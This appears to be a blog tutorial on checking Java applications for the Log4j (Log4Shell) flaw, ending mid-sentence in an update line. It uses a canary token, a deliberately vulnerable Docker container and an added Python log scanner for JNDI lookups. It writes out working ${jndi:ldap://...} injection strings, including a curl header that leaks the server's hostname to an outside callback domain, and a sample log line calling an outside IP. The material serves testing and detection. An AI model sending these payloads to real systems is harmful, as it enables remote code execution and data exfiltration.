As you know, the Log4j vulnerability is rated CVSS severity level 10. It lets an attacker make a vulnerable application fetch input from a server or domain name of the attacker's choosing through JNDI (Java Naming and Directory Interface): all an attacker needs is to get a string like ${jndi:ldap://test.com/a} into a value the application logs. Fortunately there are ways to test whether your apps or servers are affected. Follow the steps below to test your app for the vulnerability (the example uses a sample Docker container that contains this vulnerability).
Updates (Important links):
- Tool to check your source files for Log4j Vulnerability
- Which Java versions are affected?
- How to Fix Log4j vulnerability
- What is Log4j vulnerability?
- Headers exploited in Log4j vulnerability
Steps to test your server for Log4j Vulnerability
Step 1: Go to canarytokens.com
Step 2: Enter your email address and a reminder of where you are going to use the token
Step 3: Once the token is created, you will see an image like this
Step 4: Someone has created a Docker container that includes the Log4j vulnerability; start it on your local machine with the command below
docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
You can read more about it here – https://github.com/christophetd/log4shell-vulnerable-app (it has more detailed steps on how to run it on localhost)
Step 5: Once you run the Docker container, it starts as shown below
Step 6: Now send the canary token you created in Step 3 from another terminal, as shown below (the header name is X-Api-Version, which the sample app logs)
curl ServerName:Port -H "X-Api-Version:${jndi:ldap://x${hostName}.L4J.79d6i83o60p1x6wq6516lgwu1.canarytokens.com/a}"
The canary token now also carries the hostname (the ${hostName} lookup in the header), which lets you test your internal applications as well: if the application is vulnerable, the canary token email notification also shows the hostname. Once you have run this command, it triggers a request to the canary tokens website, and you can also see the request arriving in the Docker container you are running.
Step 7: You will also get an email notification from Canary Tokens, as shown below (the token reminder is very important, as it lets you know where it was triggered from. I just kept it with a wrong spelling, Webistes, so I know where it got triggered from)
By following the steps above you can check whether your Java app is vulnerable. All you need to do is create a canary token and send a curl command from a terminal to see what happens!
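As an added defender-side complement to the test above (this is not code from the original post, from canarytokens.com or from the sample app), the Python snippet below scans captured request headers or log lines for ${jndi:...} lookups like the one the curl command sends, keeps nested ${hostName} expressions intact by counting braces, and separates your own canary self-tests from lookups that call back anywhere else. The log lines, the 198.51.100.23 address and the CANARY_DOMAIN value are constructed for the example.

```python
import re

# Assumption: canarytokens.com is where your own Log4Shell test tokens call back.
# Any other callback host is treated as a lookup that needs investigation.
CANARY_DOMAIN = "canarytokens.com"

JNDI_START = re.compile(r"\$\{jndi:", re.IGNORECASE)


def extract_jndi_lookups(text):
    """Return every ${jndi:...} expression in text. Braces are counted so a
    nested lookup such as ${hostName} inside the URL stays part of the match
    instead of cutting it off at the first '}'."""
    lookups = []
    for m in JNDI_START.finditer(text):
        depth, i = 0, m.start()
        while i < len(text):
            if text.startswith("${", i):
                depth += 1
                i += 2
                continue
            if text[i] == "}":
                depth -= 1
                if depth == 0:
                    lookups.append(text[m.start():i + 1])
                    break
            i += 1
    return lookups


def callback_host(lookup):
    """Host part of the JNDI URL (scheme://host[:port]/...), port stripped, or None."""
    m = re.match(r"\$\{jndi:[a-z]+://([^/]+)", lookup, re.IGNORECASE)
    return re.sub(r":\d+$", "", m.group(1)) if m else None


def classify(line):
    """'clean' (no lookup), 'self-test' (all callbacks go to your canary domain)
    or 'suspect' (a callback goes somewhere else)."""
    hosts = [callback_host(l) for l in extract_jndi_lookups(line)]
    if not hosts:
        return "clean"
    if all(h is not None and h.endswith("." + CANARY_DOMAIN) for h in hosts):
        return "self-test"
    return "suspect"


# Constructed sample lines: the page's canary header, a non-canary lookup, a normal request.
SAMPLE_LOG = [
    '2021-12-13T17:00:01Z 127.0.0.1 GET / X-Api-Version="${jndi:ldap://x${hostName}.L4J.79d6i83o60p1x6wq6516lgwu1.canarytokens.com/a}"',
    '2021-12-13T17:00:02Z 10.0.0.7 GET / X-Api-Version="${jndi:ldap://198.51.100.23:1389/a}"',
    '2021-12-13T17:00:03Z 10.0.0.9 GET / X-Api-Version="1.0"',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line), extract_jndi_lookups(line))
```

Run it over your real access or application logs to confirm that the only JNDI lookups recorded during the test are the ones pointing at your canary domain.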
Update 12/13 | 5PM UTC: CanaryTokens now